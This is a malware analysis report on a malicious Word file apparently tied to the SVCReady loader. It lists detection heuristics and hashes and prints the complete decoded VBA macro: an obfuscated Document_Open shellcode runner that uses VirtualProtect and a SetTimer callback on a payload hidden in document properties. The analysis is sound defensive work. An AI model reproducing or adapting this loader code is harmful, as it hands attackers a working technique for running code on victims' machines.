Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 c71fa657d1264aea…

MALICIOUS

Office (OOXML) / .DOC

2.62 MB Created: 2022-06-16 23:45:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-06-20
MD5: 5bd1110589e70c5f9203a3a1d8839b1e SHA-1: a496221115d08aabcbf5e09245544195cc8d543c SHA-256: c71fa657d1264aeab2d3f657edc70a4455893d1cf7f3502adb7c7d4ca8e9335e
310 Risk Score

Heuristics 9

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/bfOdbAduAS.bin)
  • VBA property-stored shellcode loader critical OLE_VBA_PROPERTY_SHELLCODE_LOADER
    VBA auto-exec macro takes the address (VarPtr) of a byte buffer decoded from a document property, marks memory executable (VirtualProtect/VirtualAlloc), and transfers control through a callback API (e.g. SetTimer/EnumWindows). The payload is hidden in the document properties rather than the macro source — the SVCReady loader pattern, a native shellcode runner rather than a parser CVE.
    Matched line in script
    Private Declare PtrSafe Function DucdameAnanta Lib "user32" Alias "SetTimer" (ByVal OvernobleNontheatricCrawliest As LongPtr, ByVal OveremploymentKaddishDeuteroprism As LongPtr, ByVal HeniquensGranulocyticJustified As LongPtr, ByVal UnaceticUnconvergingRidgels As LongPtr) As LongPtr
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject(ZFqgKX467Zy("jAlSdqDlp")).Environment(ZFqgKX467Zy("vjQh2YXnv3hU"))(ZFqgKX467Zy("iYEzZJvg8VdT")) = ActiveDocument.FullName
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject(ZFqgKX467Zy("jAlSdqDlp")).Environment(ZFqgKX467Zy("vjQh2YXnv3hU"))(ZFqgKX467Zy("iYEzZJvg8VdT")) = ActiveDocument.FullName
  • VBA reads reversed config from document properties high OLE_VBA_REVERSED_DOCPROP_CONFIG
    VBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.
    Matched line in script
    ZFqgKX467Zy = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • OOXML part with non-standard content type and high-entropy data high OOXML_BOGUS_CUSTOM_PART
    The package declares a part with an invented content type (not an OpenXML/Office/standard media type) holding large, high-entropy (likely encrypted/packed) data. Legitimate OOXML files do not carry opaque binary blobs under custom content types; this is the embedded next-stage payload pattern used by loaders such as SVCReady.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5293 bytes
SHA-256: 27b38d0da2e3acfb78f4c43a3fd08fb1a12b4a3dd599f5560d53ae8012899c0b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function DucdameAnanta Lib "user32" Alias "SetTimer" (ByVal OvernobleNontheatricCrawliest As LongPtr, ByVal OveremploymentKaddishDeuteroprism As LongPtr, ByVal HeniquensGranulocyticJustified As LongPtr, ByVal UnaceticUnconvergingRidgels As LongPtr) As LongPtr
Private Declare PtrSafe Function PrecriticalAequorinHouseboys Lib "kernel32" Alias "VirtualProtect" (ByVal SuckeredDefraudingPointedness As LongPtr, ByVal SemichiffonBarse As LongPtr, ByVal RamositiesUnism As LongPtr, HorseradishesWizeningTiddledywinks As LongPtr) As LongPtr
Private Declare PtrSafe Function SelloutDiscorporate Lib "user32" Alias "KillTimer" (ByVal IberianCoracoradialis As LongPtr, ByVal PremateTunga As LongPtr) As LongPtr
#Else
Private Declare Function DucdameAnanta Lib "user32" Alias "SetTimer" ( ByVal TsarismsMandarinshipPolycentric As Long, ByVal TchekaBasehearted As Long, ByVal EvulsionsSemiweekly As Long, ByVal CorsacReinvoked As Any) As Long
Private Declare Function PrecriticalAequorinHouseboys Lib "kernel32" Alias "VirtualProtect"  (ByVal ReadiedPhokomeliaOverfills As Long, ByVal ScheuchzeriaShiniestVaccary As Long, ByVal ExceptionabilityPurifying As Long, NearcticEvittateFieldfare As Long) As Long
Private Declare Function SelloutDiscorporate Lib "user32" Alias "KillTimer" ( ByVal GallicThanatometer As Long, ByVal GeodeticsOverspringPrecopulatory As Long) As Long
#End If
Private Sub Document_Open()
Dim CatallacticallyBankruptAgpaite() As Byte
#If Win64 Then
CatallacticallyBankruptAgpaite = SeisorChallenger(ActiveDocument.BuiltInDocumentProperties(ZFqgKX467Zy("reVHu90FnGWC")).Value)
#Else
CatallacticallyBankruptAgpaite = SeisorChallenger(ActiveDocument.BuiltInDocumentProperties(ZFqgKX467Zy("zY2Sgp")).Value)
#End If
#If VBA7 Then
Dim ReinstationGirgashite As LongPtr
Dim MisdefinesOxeateAquilia As LongPtr
Dim PaedomorphosisMandibulohyoid As LongPtr
Dim PreinvestigatorSlaggerZygnemataceous As LongPtr
#Else
Dim ReinstationGirgashite As Long
Dim MisdefinesOxeateAquilia As Long
Dim PaedomorphosisMandibulohyoid As Long
Dim PreinvestigatorSlaggerZygnemataceous As Long
#End If
MisdefinesOxeateAquilia = UBound(CatallacticallyBankruptAgpaite) + 1
PaedomorphosisMandibulohyoid = VarPtr(CatallacticallyBankruptAgpaite(0))
PrecriticalAequorinHouseboys PaedomorphosisMandibulohyoid, MisdefinesOxeateAquilia, 64, VarPtr(ReinstationGirgashite)
GetObject(ZFqgKX467Zy("jAlSdqDlp")).Environment(ZFqgKX467Zy("vjQh2YXnv3hU"))(ZFqgKX467Zy("iYEzZJvg8VdT")) = ActiveDocument.FullName
GetObject(ZFqgKX467Zy("dIys8xed48")).Environment(ZFqgKX467Zy("udxpfySMcTOGv"))(ZFqgKX467Zy("hpVwJQZn")) = ZFqgKX467Zy("gvGleLYFVA")
PreinvestigatorSlaggerZygnemataceous = DucdameAnanta(0, PaedomorphosisMandibulohyoid, 1, PaedomorphosisMandibulohyoid)
NonmonistDreadingArchitectress 1
SelloutDiscorporate 0, PreinvestigatorSlaggerZygnemataceous
GetObject(ZFqgKX467Zy("CkegJd8SjE4J")).Environment(ZFqgKX467Zy("IGOOLyweNo")).Remove (ZFqgKX467Zy("osg25K6KAJ"))
GetObject(ZFqgKX467Zy("xxpU8gqobCPNO")).Environment(ZFqgKX467Zy("LHPL8CLT")).Remove (ZFqgKX467Zy("mDVJuiju"))
ReDim CatallacticallyBankruptAgpaite(1)
End Sub
Sub NonmonistDreadingArchitectress(Finish)
Dim RadiometeorographCantonmentIridectomies As Long
Dim PacifisticallyMontpelierDowers As Long
PacifisticallyMontpelierDowers = Timer() + (Finish)
Do
RadiometeorographCantonmentIridectomies = Timer()
DoEvents
Loop Until RadiometeorographCantonmentIridectomies > PacifisticallyMontpelierDowers
End Sub
Function CurbstonerHeliograph(WedgeableParchmentizeCordwainery, OrodiagnosisOotocoidBauson)
CurbstonerHeliograph = Mid(WedgeableParchmentizeCordwainery, OrodiagnosisOotocoidBauson + 1, 1)
End Function
Public Function ZFqgKX467Zy(strInput)
ZFqgKX467Zy = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
End Function
Function NotodontidaeCilioretinalCoxalgia(CyprusesTotalitarianErratically) As Long
If Int(Rnd(23)) > 2 Then
NotodontidaeCilioretinalCoxalgia = 9000
Else
NotodontidaeCilioretinalCoxalgia = Len(CyprusesTotalitarianErratically)
End If
End Function
Function SeisorChallenger(SalveDowsabelsDisannuls)
ReDim UnexternalAntiannexationistFermentability(NotodontidaeCilioretinalCoxalgia(SalveDowsabelsDisannuls) - 1) As Byte
Dim ScolopendriumMantelpiecesAccentuate As Long, PreacherizeAlliterations As Long
Dim UnderreceiverStrawwork: UnderreceiverStrawwork = ZFqgKX467Zy("ZMLqk2KfT") & ZFqgKX467Zy("RzJ_TXWld")
For ScolopendriumMantelpiecesAccentuate = 0 To NotodontidaeCilioretinalCoxalgia(SalveDowsabelsDisannuls) - 1 Step 2
PreacherizeAlliterations = ScolopendriumMantelpiecesAccentuate / 2
UnexternalAntiannexationistFermentability(PreacherizeAlliterations) = CDec(UnderreceiverStrawwork & CurbstonerHeliograph(SalveDowsabelsDisannuls, ScolopendriumMantelpiecesAccentuate) & CurbstonerHeliograph(SalveDowsabelsDisannuls, ScolopendriumMantelpiecesAccentuate + 1))
Next
SeisorChallenger = UnexternalAntiannexationistFermentability
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/bfOdbAduAS.bin 8704 bytes
SHA-256: dd19c8203868beb077504aaec5b61d99ae7cdd531d73cfb470084c7621bf34ff

Open this report in the interactive analyzer, or submit your own file for analysis.